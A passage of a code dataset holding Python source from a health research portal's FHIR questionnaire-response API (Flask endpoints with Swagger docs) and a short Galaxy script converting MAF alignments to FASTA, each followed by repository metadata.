not isinstance(answer['valueCoding']['extension'], (tuple, list))
):
answer['valueCoding']['extension'] = [answer['valueCoding']['extension']]
# Hack: add missing "resource" wrapper for DTSU2 compliance
# Remove when all interventions compliant
if request.args.get('patch_dstu2'):
document = {
'resource': document,
'fullUrl': request.url,
}
# No place within the FHIR spec to associate 'visit name' nor a
# 'status' as per business rules (i.e. 'in-progress' becomes
# 'partially completed' once the associated QB expires).
# Use FHIR `extension`s to pass these fields to clients.
extensions = qnr.extensions()
if extensions:
assert('extension' not in qnr.document) # catch future collisions
document['extension'] = extensions
documents.append(document)
link = {'rel': 'self', 'href': request.url}
return jsonify(bundle_results(elements=documents, links=[link]))
@assessment_engine_api.route(
'/api/patient/<int:patient_id>/questionnaire_response/<int:qnr_id>'
)
@crossdomain()
@oauth.require_oauth()
def get_qnr_by_id(patient_id, qnr_id):
"""Return the patient's requested questionaire_response
Retrieve a minimal FHIR doc in JSON format including the
'QuestionnaireResponse' resource type.
---
operationId: getQuestionnaireResponseById
tags:
- Assessment Engine
produces:
- application/json
parameters:
- name: patient_id
in: path
description: TrueNTH patient ID
required: true
type: integer
format: int64
- name: qnr_id
in: path
description:
ID (primary key) of the requested Questionnaire Response
required: true
type: string
enum:
- epic26
- eq5d
- name: patch_dstu2
in: query
description: whether or not to make bundles DTSU2 compliant
required: false
type: boolean
default: false
responses:
200:
description: successful operation
schema:
$ref: "#/definitions/QuestionnaireResponse"
401:
description:
if missing valid OAuth token or logged-in user lacks permission
to view requested patient
security:
- ServiceToken: []
"""
patient = get_user(
patient_id, 'view', allow_on_url_authenticated_encounters=True)
qnr = QuestionnaireResponse.query.get(qnr_id)
if not qnr:
abort(404)
if qnr.subject_id != patient.id:
abort(
400,
"Requested patient doesn't own requested questionnaire_response")
# NB, document_answered returns a (potentially) modified *copy* of
# the document, so changes aren't persisted or found in db session
# cached objects. see TN-2417 for example side-effects
document = qnr.document_answered
for question in document['group']['question']:
for answer in question['answer']:
# Hack: Extensions should be a list, correct in-place if need be
# todo: migrate towards FHIR spec in persisted data
if (
'extension' in answer.get('valueCoding', {}) and
not isinstance(answer['valueCoding']['extension'], (tuple, list))
):
answer['valueCoding']['extension'] = [answer['valueCoding']['extension']]
# Hack: add missing "resource" wrapper for DTSU2 compliance
# Remove when all interventions compliant
if request.args.get('patch_dstu2'):
document = {
'resource': document,
'fullUrl': request.url,
}
# No place within the FHIR spec to associate 'visit name' nor a
# 'status' as per business rules (i.e. 'in-progress' becomes
# 'partially completed' once the associated QB expires).
# Use FHIR `extension`s to pass these fields to clients.
extensions = qnr.extensions()
if extensions:
assert('extension' not in qnr.document) # catch future collisions
document['extension'] = extensions
return jsonify(document)
@assessment_engine_api.route('/api/patient/assessment')
@crossdomain()
@roles_required(
[ROLE.STAFF_ADMIN.value, ROLE.STAFF.value, ROLE.RESEARCHER.value])
@oauth.require_oauth()
def get_assessments():
"""
Return multiple patient's responses to all questionnaires
NB list of patient's returned is limited by current_users implicit
permissions, typically controlled through organization affiliation.
---
operationId: getQuestionnaireResponses
tags:
- Assessment Engine
parameters:
- name: format
in: query
description: format of file to download (CSV or JSON)
required: false
type: string
enum:
- json
- csv
default: json
- name: patch_dstu2
in: query
description: whether or not to make bundles DTSU2 compliant
required: false
type: boolean
default: false
- name: instrument_id
in: query
description:
ID of the instrument, eg "epic26", "eq5d"
required: false
type: array
items:
type: string
enum:
- epic26
- eq5d
collectionFormat: multi
produces:
- application/json
responses:
200:
description: successful operation
schema:
id: assessments_bundle
required:
- type
properties:
type:
description:
Indicates the purpose of this bundle- how it was
intended to be used.
type: string
enum:
- document
- message
- transaction
- transaction-response
- batch
- batch-response
- history
- searchset
- collection
link:
description:
A series of links that provide context to this bundle.
items:
properties:
relation:
description:
A name which details the functional use for
this link - see [[http://www.iana.org/assignments/link-relations/link-relations.xhtml]].
url:
description: The reference details for the link.
total:
description:
If a set of search matches, this is the total number of
matches for the search (as opposed to the number of
results in this bundle).
type: integer
entry:
type: array
items:
$ref: "#/definitions/FHIRPatient"
401:
description:
if missing valid OAuth token or logged-in user lacks permission
to view requested patient
security:
- ServiceToken: []
- OAuth2AuthzFlow: []
"""
from ..tasks import research_report_task
research_studies = set()
questionnaire_list = request.args.getlist('instrument_id')
for q in questionnaire_list:
research_studies.add(research_study_id_from_questionnaire(q))
if len(research_studies) != 1:
abort(
400,
f"Requested instruments ({questionnaire_list}) span multiple "
"research studies")
research_study_id = research_studies.pop()
if research_study_id is None:
research_study_id = 0
# This frequently takes over a minute to produce. Generate a serializable
# form of all args for reliable hand off to a background task.
kwargs = {
'instrument_ids': questionnaire_list,
'research_study_id': research_study_id,
'acting_user_id': current_user().id,
'patch_dstu2': request.args.get('patch_dstu2'),
'request_url': request.url,
'lock_key': "research_report_task_lock",
'response_format': request.args.get('format', 'json').lower()
}
try:
# Hand the task off to the job queue, and return 202 with URL for
# checking the status of the task
task = guarded_task_launch(research_report_task, **kwargs)
return jsonify({}), 202, {'Location': url_for(
'portal.task_status', task_id=task.id, _external=True)}
except LockTimeout:
msg = (
"The system is busy exporting a report for another user. "
"Please try again in a few minutes.")
response = make_response(msg, 502)
response.mimetype = "text/plain"
return response
@assessment_engine_api.route(
'/api/patient/<int:patient_id>/assessment',
methods=('PUT',),
)
@crossdomain()
@oauth.require_oauth()
def assessment_update(patient_id):
"""Update an existing questionnaire response on a patient's record
Submit a minimal FHIR doc in JSON format including the 'QuestionnaireResponse'
resource type.
---
operationId: updateQuestionnaireResponse
tags:
- Assessment Engine
produces:
- application/json
parameters:
- name: patient_id
in: path
description: TrueNTH patient ID
required: true
type: integer
format: int64
- in: body
name: body
schema:
$ref: "#/definitions/QuestionnaireResponse"
responses:
401:
description:
if missing valid OAuth token or logged-in user lacks permission
to view requested patient
404:
description: existing QuestionnaireResponse not found
security:
- ServiceToken: []
"""
if not hasattr(request, 'json') or not request.json:
return jsonify(message='Invalid request - requires JSON'), 400
if request.json.get('resourceType') != 'QuestionnaireResponse':
return jsonify(
message='Requires resourceType of "QuestionnaireResponse"'), 400
# Verify the current user has permission to edit given patient
patient = get_user(
patient_id, 'edit', allow_on_url_authenticated_encounters=True)
response = {
'ok': False,
'message': 'error updating questionnaire response',
'valid': False,
}
updated_qnr = request.json
try:
QuestionnaireResponse.validate_document(updated_qnr)
QuestionnaireResponse.validate_authored(
FHIR_datetime.parse(updated_qnr.get('authored')))
except (jsonschema.ValidationError, NoFutureDates) as e:
return jsonify({
'ok': False,
'message': str(e),
'reference': getattr(e, 'schema', ''),
}), 400
else:
response.update({
'ok': True,
'message': 'questionnaire response valid',
'valid': True,
})
try:
identifier = Identifier.from_fhir(updated_qnr.get('identifier'))
except ValueError as e:
response['message'] = str(e)
return jsonify(response), 400
existing_qnr = QuestionnaireResponse.by_identifier(identifier)
if existing_qnr.count() == 0:
current_app.logger.warning(
"attempted update on QuestionnaireResponse with unknown "
"identifier {}".format(identifier))
response['message'] = "existing QuestionnaireResponse not found"
return jsonify(response), 404
if existing_qnr.count() > 1:
msg = ("can't update; multiple QuestionnaireResponses found with "
"identifier {}".format(identifier))
current_app.logger.warning(msg)
response['message'] = msg
return jsonify(msg), 409
response.update({'message': 'previous questionnaire response found'})
existing_qnr = existing_qnr.first()
existing_qnr.status = updated_qnr["status"]
existing_qnr.document = updated_qnr
db.session.add(existing_qnr)
db.session.commit()
existing_qnr.assign_qb_relationship(acting_user_id=current_user().id)
# TODO: only extract QuestionnaireResponses where the corresponding Questionnaire has the SDC extension
qn_name = existing_qnr.document.get("questionnaire").get("reference", '').split('/')[-1]
if qn_name == 'ironman_ss' and existing_qnr.status == 'completed':
from ..tasks import extract_observations_task
extract_observations_task.apply_async(
kwargs={'questionnaire_response_id': existing_qnr.id}
)
auditable_event(
"updated {}".format(existing_qnr),
user_id=current_user().id,
subject_id=patient.id,
context='assessment',
)
response.update({'message': 'questionnaire response updated successfully'})
invalidate_users_QBT(patient.id, research_study_id='all')
return jsonify(response)
@assessment_engine_api.route(
'/api/patient/<int:patient_id>/assessment', methods=('POST',))
@crossdomain()
@oauth.require_oauth()
def assessment_add(patient_id):
"""Add a questionnaire response to a patient's record
Submit a minimal FHIR doc in JSON format including the
'QuestionnaireResponse' resource type.
NB, updates are only possible on QuestionnaireResponses for which a
well defined ``identifer`` is included. If included, this value must
be distinct over (``system``, ``value``). A duplicate submission will
result in a ``409: conflict`` response, and refusal to retain the
submission.
---
operationId: addQuestionnaireResponse
tags:
- Assessment Engine
definitions:
- schema:
id: Question
description: An individual question and related attributes
type: object
externalDocs:
url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.group.question
additionalProperties: false
properties:
text:
description: Question text
type: string
linkId:
description: Corresponding question within Questionnaire
type: string
answer:
description:
The respondent's answer(s) to the question
externalDocs:
url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.group.question.answer
type: array
items:
$ref: "#/definitions/Answer"
- schema:
id: Answer
description:
An individual answer to a question and related attributes.
May only contain a single value[x] attribute
type: object
externalDocs:
url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.group.question.answer.value_x_
additionalProperties: false
properties:
valueBoolean:
description: Boolean value answer to a question
type: boolean
valueDecimal:
description: Decimal value answer to a question
type: number
valueInteger:
description: Integer value answer to a question
type: integer
valueDate:
description: Date value answer to a question
type: string
format: date
valueDateTime:
description: Datetime value answer to a question
type: string
format: date-time
valueInstant:
description: Instant value answer to a question
type: string
format: date-time
valueTime:
description: Time value answer to a question
type: string
valueString:
description: String value answer to a question
type: string
valueUri:
description: URI value answer to a question
type: string
valueAttachment:
description: Attachment value answer to a question
$ref: "#/definitions/ValueAttachment"
valueCoding:
description:
Coding value answer to a question, may include score as
FHIR extension
$ref: "#/definitions/ValueCoding"
valueQuantity:
description: Quantity value answer to a question
$ref: "#/definitions/Quantity"
valueReference:
description: Reference value answer to a question
$ref: "#/definitions/Reference"
group:
description: Nested questionnaire group
$ref: "#/definitions/Group"
- schema:
id: Group
description:
A structured set of questions and their answers. The
questions are ordered and grouped into coherent subsets,
corresponding to the structure of the grouping of the
questionnaire being responded to.
type: object
additionalProperties: false
properties:
linkId:
description:
The item from the Questionnaire that corresponds to this item
in the QuestionnaireResponse resource.
type: string
title:
description: Name for this group
type: string
text:
description:
Text that is displayed above the contents of the group or as
the text of the question being answered.
type: string
question:
description: Questions in this group.
items:
$ref: "#/definitions/Question"
type: array
group:
description:
Questions or sub-groups nested beneath a question or group.
items:
$ref: "#/definitions/Group"
type: array
- schema:
id: Quantity
description:
A measured amount (or an amount that can potentially be measured).
Note that measured amounts include amounts that are not precisely
quantified, including amounts involving arbitrary units and
floating currencies.
type: object
additionalProperties: false
properties:
id:
description:
Unique id for the element within a resource (for internal
references). This may be any string value that does not
contain spaces.
type: string
value:
description:
The value of the measured amount. The value includes an
implicit precision in the presentation of the value.
type: number
comparator:
description:
How the value should be understood and represented - whether
the actual value is greater or less than the stated value due
to measurement issues; e.g. if the comparator is \"\u003c\" ,
then the real value is \u003c stated value.
type: string
enum:
- "\u003c"
- "\u003c\u003d"
- "\u003e\u003d"
- "\u003e"
unit:
description: A human-readable form of the unit.
type: string
system:
description:
The identification of the system that provides the coded form
of the unit.
type: string
code:
description:
A computer processable form of the unit in some unit
representation system.
type: string
- schema:
id: Questionnaire
type: object
additionalProperties: false
properties:
display:
description: Name of Questionnaire
type: string
reference:
description: URI uniquely defining the Questionnaire
type: string
- schema:
id: QuestionnaireResponse
type: object
required:
- resourceType
- status
additionalProperties: false
properties:
identifier:
description:
A business identifier assigned to a particular completed
(or partially completed) questionnaire.
$ref: "#/definitions/Identifier"
questionnaire:
description:
The Questionnaire that defines and organizes the questions
for which answers are being provided.
$ref: "#/definitions/Questionnaire"
resourceType:
description:
defines FHIR resource type, must be QuestionnaireResponse
type: string
status:
externalDocs:
url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.status
description:
The lifecycle status of the questionnaire response as a
whole. If submitting a QuestionnaireResponse with status
"in-progress", the ``identifier`` must also be well
defined. Without it, there's no way to reference it
for updates.
type: string
enum:
- in-progress
- completed
subject:
description:
The subject of the questionnaire response. This could be
a patient, organization, practitioner, device, etc. This
is who/what the answers apply to, but is not necessarily
the source of information.
$ref: "#/definitions/Reference"
author:
description:
Person who received the answers to the questions in the
QuestionnaireResponse and recorded them in the system.
$ref: "#/definitions/Reference"
authored:
externalDocs:
url: http://hl7.org/implement/standards/fhir/DSTU2/questionnaireresponse-definitions.html#QuestionnaireResponse.authored
description: The datetime this resource was last updated
type: string
format: date-time
source:
$ref: "#/definitions/Reference"
group:
description:
A group or question item from the original questionnaire for
which answers are provided.
type: object
$ref: "#/definitions/Group"
example:
resourceType: QuestionnaireResponse
authored: '2016-03-11T23:47:28Z'
status: completed
identifier:
value: '119.0'
use: official
label: cPRO survey session ID
system: 'https://ae.us.truenth.org/eproms'
subject:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
author:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
source:
display: patient demographics
reference: https://stg.us.truenth.org/api/demographics/10015
group:
question:
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.1.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.1
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.2.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.2
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.3.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.3
- answer: []
linkId: epic26.4
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.5.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.5
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.6.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.6
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.7.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.7
- answer: []
linkId: epic26.8
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.9.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.9
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.10.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.10
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.11.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.11
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.12.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.12
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.13.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.13
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.14.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.14
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.15.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 5
linkId: epic26.15
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.16.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.16
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.17.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.17
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.18.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.18
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.19.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.19
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.20.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.20
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.21.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 5
linkId: epic26.21
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.22.1
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 0
linkId: epic26.22
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.23.2
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 1
linkId: epic26.23
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.24.3
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 2
linkId: epic26.24
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.25.4
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 3
linkId: epic26.25
- answer:
- valueCoding:
system: https://stg.us.truenth.org/api/codings/assessment
code: epic26.26.5
extension:
url: https://hl7.org/fhir/StructureDefinition/iso21090-CO-value
valueDecimal: 4
linkId: epic26.26
questionnaire:
display: EPIC 26 Short Form
reference: https://stg.us.truenth.org/api/questionnaires/epic26
- schema:
id: Reference
description: link to an internal or external resource
type: object
additionalProperties: false
properties:
reference:
description: Relative, internal or absolute URL reference
type: string
display:
description: Text alternative for the resource
type: string
- schema:
id: ValueAttachment
description: For referring to data content defined in other formats
type: object
additionalProperties: false
properties:
contentType:
description:
Identifies the type of the data in the attachment and allows
a method to be chosen to interpret or render the data.
Includes mime type parameters such as charset where
appropriate.
type: string
language:
description:
The human language of the content. The value can be any valid
value according to BCP 47.
type: string
data:
description:
The actual data of the attachment - a sequence of bytes,
base64 encoded.
type: string
format: byte
url:
description: A location where the data can be accessed.
type: string
size:
description:
The number of bytes of data that make up this attachment
(before base64 encoding, if that is done).
type: integer
hash:
description:
The calculated hash of the data using SHA-1.
Represented using base64.
type: string
format: byte
title:
description:
A label or set of text to display in place of the data.
type: string
creation:
description: The date that the attachment was first created.
type: string
format: date-time
- schema:
id: ValueCoding
type: object
additionalProperties: false
properties:
system:
description: Identity of the terminology system
type: string
format: uri
version:
description: Version of the system - if relevant
type: string
code:
description: Symbol in syntax defined by the system
type: string
display:
description: Representation defined by the system
type: string
userSelected:
description: If this coding was chosen directly by the user
type: boolean
extension:
description:
Extension - Numerical value associated with the code
$ref: "#/definitions/ValueDecimalExtension"
- schema:
id: ValueDecimalExtension
type: object
additionalProperties: false
properties:
url:
description: Hardcoded reference to extension
type: string
format: uri
valueDecimal:
description: Numeric score value
type: number
produces:
- application/json
parameters:
- name: patient_id
in: path
description: TrueNTH patient ID
required: true
type: integer
format: int64
- name: entry_method
in: query
description: Entry method such as `paper` if known
required: false
type: string
- in: body
name: body
schema:
$ref: "#/definitions/QuestionnaireResponse"
responses:
401:
description:
if missing valid OAuth token or logged-in user lacks permission
to view requested patient
security:
- ServiceToken: []
"""
if not hasattr(request, 'json') or not request.json:
return jsonify(message='Invalid request - requires JSON'), 400
if request.json.get('resourceType') != 'QuestionnaireResponse':
return jsonify(
message='Requires resourceType of "QuestionnaireResponse"'), 400
# Verify the current user has permission to edit given patient
patient = get_user(
patient_id, 'edit', allow_on_url_authenticated_encounters=True)
response = {
'ok': False,
'message': 'error saving questionnaire response',
'valid': False,
}
try:
QuestionnaireResponse.validate_document(request.json)
QuestionnaireResponse.validate_authored(
FHIR_datetime.parse(request.json.get('authored')))
except (jsonschema.ValidationError, NoFutureDates) as e:
response = {
'ok': False,
'message': str(e),
'reference': getattr(e, 'schema', ''),
}
return jsonify(response), 400
identifier = None
if 'identifier' in request.json:
# Confirm it's unique, or raise 409
try:
identifier = Identifier.from_fhir(request.json['identifier'])
except ValueError as e:
response['message'] = str(e)
return jsonify(response), 400
existing_qnr = QuestionnaireResponse.by_identifier(identifier)
if existing_qnr.count():
msg = ("QuestionnaireResponse with matching {} already exists; "
"must be unique over (system, value)".format(identifier))
current_app.logger.warning(msg)
response['message'] = msg
return jsonify(response), 409
if request.json.get('status') == 'in-progress' and not identifier:
msg = "Status {} received without the required identifier".format(
request.json.get('status'))
current_app.logger.warning(msg)
response['message'] = msg
return jsonify(response), 400
response.update({
'ok': True,
'message': 'questionnaire response valid',
'valid': True,
})
encounter = current_user().current_encounter()
if QuestionnaireResponse.query.filter(
QuestionnaireResponse.encounter_id == encounter.id).count():
# Another QuestionnaireResponse already attached to this encounter,
# force a refresh to maintain a discrete QNR <=> Encounter pair.
encounter = current_user().current_encounter(force_refresh=True)
if 'entry_method' in request.args:
encounter_type = getattr(
EC, request.args['entry_method'].upper()).codings[0]
encounter.type.append(encounter_type)
questionnaire_response = QuestionnaireResponse(
subject_id=patient_id,
status=request.json["status"],
document=request.json,
encounter=encounter,
)
db.session.add(questionnaire_response)
db.session.commit()
questionnaire_response.assign_qb_relationship(
acting_user_id=current_user().id)
# TODO: only extract QuestionnaireResponses where the corresponding Questionnaire has the SDC extension
qn_name = questionnaire_response.document.get("questionnaire").get("reference", '').split('/')[-1]
if qn_name == 'ironman_ss' and questionnaire_response.status == 'completed':
from ..tasks import extract_observations_task
extract_observations_task.apply_async(
kwargs={'questionnaire_response_id': questionnaire_response.id}
)
auditable_event("added {}".format(questionnaire_response),
user_id=current_user().id, subject_id=patient_id,
context='assessment')
response.update({'message': 'questionnaire response saved successfully'})
invalidate_users_QBT(patient.id, research_study_id='all')
return jsonify(response)
@assessment_engine_api.route('/api/invalidate/<int:user_id>')
@oauth.require_oauth()
def invalidate(user_id):
user = get_user(user_id, 'edit')
invalidate_users_QBT(user_id, research_study_id='all')
return jsonify(invalidated=user.as_fhir())
@assessment_engine_api.route('/api/present-needed')
@roles_required([ROLE.STAFF_ADMIN.value, ROLE.STAFF.value, ROLE.PATIENT.value])
@oauth.require_oauth()
def present_needed():
"""Look up needed and in process q's for user and then present_assessment
Takes the same attributes as present_assessment.
If `authored` date is different from utcnow(), any instruments found to be
in an `in_progress` state will be treated as if they haven't been started.
Manages a single research study at a time. For all research studies a
user is enrolled in, present-needed on the first found with outstanding
work. Call again after completion to pick up the next study.
"""
from ..models.qb_status import QB_Status # avoid cycle
subject_id = request.args.get('subject_id') or current_user().id
subject = get_user(
subject_id, 'edit', allow_on_url_authenticated_encounters=True)
as_of_date = FHIR_datetime.parse(
request.args.get('authored'), none_safe=True)
if not as_of_date:
as_of_date = datetime.utcnow()
for rs in ResearchStudy.assigned_to(subject):
assessment_status = QB_Status(
subject, research_study_id=rs, as_of_date=as_of_date)
if assessment_status.overall_status == 'Withdrawn':
abort(400, 'Withdrawn; no pending work found')
args = dict(request.args.items())
args['instrument_id'] = (
assessment_status.instruments_needing_full_assessment(
classification='all'))
# Instruments in progress need special handling. Assemble
# the list of external document ids for reliable resume
# behavior at external assessment intervention.
resume_ids = assessment_status.instruments_in_progress(
classification='all')
if resume_ids:
args['resume_identifier'] = resume_ids
if args.get('instrument_id') or args.get('resume_identifier'):
# work to be done in this study, break out of loop
break
if not args.get('instrument_id') and not args.get('resume_identifier'):
flash(_('All available questionnaires have been completed'))
current_app.logger.debug('no assessments needed, redirecting to /')
return redirect('/')
url = url_for('.present_assessment', **args)
if current_user().current_encounter().auth_method == "url_authenticated":
current_app.logger.debug('redirect to confirm identity')
return redirect('/confirm-identity?redirect_url={}'.format(quote(url)))
current_app.logger.debug('present assessment url, redirecting to: %s', url)
return redirect(url, code=302)
@assessment_engine_api.route('/api/present-assessment')
@crossdomain()
@roles_required([ROLE.STAFF_ADMIN.value, ROLE.STAFF.value, ROLE.PATIENT.value])
@oauth.require_oauth()
def present_assessment(instruments=None):
"""Request that TrueNTH present an assessment via the assessment engine
Redirects to the first assessment engine instance that is capable of
administering the requested assessment
---
operationId: present_assessment
tags:
- Assessment Engine
produces:
- text/html
parameters:
- name: instrument_id
in: query
description:
ID of the instrument, eg "epic26", "eq5d"
required: true
type: array
items:
type: string
enum:
- epic26
- eq5d
collectionFormat: multi
- name: resume_instrument_id
in: query
description:
ID of the instrument, eg "epic26", "eq5d"
required: true
type: array
items:
type: string
enum:
- epic26
- eq5d
collectionFormat: multi
- name: next
in: query
description: Intervention URL to return to after assessment completion
required: true
type: string
format: url
- name: subject_id
in: query
description: User ID to Collect QuestionnaireResponses as
required: false
type: integer
- name: authored
in: query
description: Override QuestionnaireResponse.authored with given datetime
required: false
type: string
format: date-time
responses:
303:
description: successful operation
headers:
Location:
description:
URL registered with assessment engine used to provide given
assessment
type: string
format: url
401:
description: if missing valid OAuth token or bad `next` parameter
security:
- ServiceToken: []
- OAuth2AuthzFlow: []
"""
queued_instruments = request.args.getlist('instrument_id')
resume_instruments = request.args.getlist('resume_instrument_id')
resume_identifiers = request.args.getlist('resume_identifier')
# Hack to allow deprecated API to piggyback
# Remove when deprecated_present_assessment() is fully removed
if instruments is not None:
queued_instruments = instruments
# Combine requested instruments into single list, maintaining order
common_instruments = resume_instruments + queued_instruments
common_instruments = sorted(
set(common_instruments),
key=lambda x: common_instruments.index(x)
)
configured_instruments = Questionnaire.questionnaire_codes()
if set(common_instruments) - set(configured_instruments):
abort(
404,
"No matching assessment found: %s" % (
", ".join(set(common_instruments) - set(configured_instruments))
)
)
assessment_params = {
"project": ",".join(common_instruments),
"resume_instrument_id": ",".join(resume_instruments),
"resume_identifier": ",".join(resume_identifiers),
"subject_id": request.args.get('subject_id'),
"authored": request.args.get('authored'),
"entry_method": request.args.get('entry_method'),
}
# Clear empty querystring params
assessment_params = {k: v for k, v in assessment_params.items() if v}
assessment_url = "".join((
INTERVENTION.ASSESSMENT_ENGINE.link_url,
"/surveys/new_session?",
requests.compat.urlencode(assessment_params),
))
if 'next' in request.args:
next_url = request.args.get('next')
# Validate next URL the same way CORS requests are
validate_origin(next_url)
current_app.logger.debug('storing session[assessment_return]: %s',
next_url)
session['assessment_return'] = next_url
return redirect(assessment_url, code=303)
@assessment_engine_api.route('/api/present-assessment/<instrument_id>')
@oauth.require_oauth()
def deprecated_present_assessment(instrument_id):
current_app.logger.warning(
"use of depricated API %s from referer %s",
request.url,
request.headers.get('Referer'),
)
return present_assessment(instruments=[instrument_id])
@assessment_engine_api.route('/api/complete-assessment')
@crossdomain()
@oauth.require_oauth()
def complete_assessment():
"""Return to the last intervention that requested an assessment be presented
Redirects to the URL passed to TrueNTH when present-assessment was last
called (if valid) or TrueNTH home
---
operationId: complete_assessment
tags:
- Internal
produces:
- text/html
responses:
303:
description: successful operation
headers:
Location:
description:
URL passed to TrueNTH when present-assessment was last
called (if valid) or TrueNTH home
type: string
format: url
401:
description: if missing valid OAuth token
security:
- ServiceToken: []
- OAuth2AuthzFlow: []
"""
next_url = session.pop("assessment_return", "/")
# Logout Assessment Engine after survey completion
for token in INTERVENTION.ASSESSMENT_ENGINE.client.tokens:
if token.user != current_user():
continue
current_app.logger.debug(
"assessment complete, logging out user: %s", token.user.id)
INTERVENTION.ASSESSMENT_ENGINE.client.notify({
'event': 'logout',
'user_id': token.user.id,
'refresh_token': token.refresh_token,
'info': 'complete-assessment',
})
db.session.delete(token)
db.session.commit()
current_app.logger.debug("assessment complete, redirect to: %s", next_url)
return redirect(next_url, code=303)
|
uwcirg/true_nth_usa_portal
|
portal/views/assessment_engine.py
|
Python
|
bsd-3-clause
| 76,196
|
[
"VisIt"
] |
b58538db2701f63bbca43eb1641df937e44aa88f3ab288499ae92d5ae73de4f1
|
#!/usr/bin/env python
"""
Read a maf and print the text as a fasta file, concatenating blocks
usage %prog species1,species2 maf_file out_file
"""
#Dan Blankenberg
import sys
from galaxy import eggs
import pkg_resources; pkg_resources.require( "bx-python" )
from bx.align import maf
from galaxy.tools.util import maf_utilities
assert sys.version_info[:2] >= ( 2, 4 )
def __main__():
print "Restricted to species:", sys.argv[1]
texts = {}
input_filename = sys.argv[2]
output_filename = sys.argv[3]
species = sys.argv[1].split( ',' )
if "None" in species:
species = maf_utilities.get_species_in_maf( input_filename )
file_out = open( output_filename, 'w' )
for spec in species:
file_out.write( ">" + spec + "\n" )
try:
for block in maf.Reader( open( input_filename, 'r' ) ):
component = block.get_component_by_src_start( spec )
if component: file_out.write( component.text )
else: file_out.write( "-" * block.text_size )
except:
print >>sys.stderr, "Your MAF file appears to be malformed."
sys.exit()
file_out.write( "\n" )
file_out.close()
if __name__ == "__main__": __main__()
|
dbcls/dbcls-galaxy
|
tools/maf/maf_to_fasta_concat.py
|
Python
|
mit
| 1,262
|
[
"Galaxy"
] |
5e74632921a4bc924aef2f6e98a19ac2ff77f4d313d51517e6a05aed66904c0d
|
########################################################################
# $HeadURL $
# File: CleanReqDBAgent.py
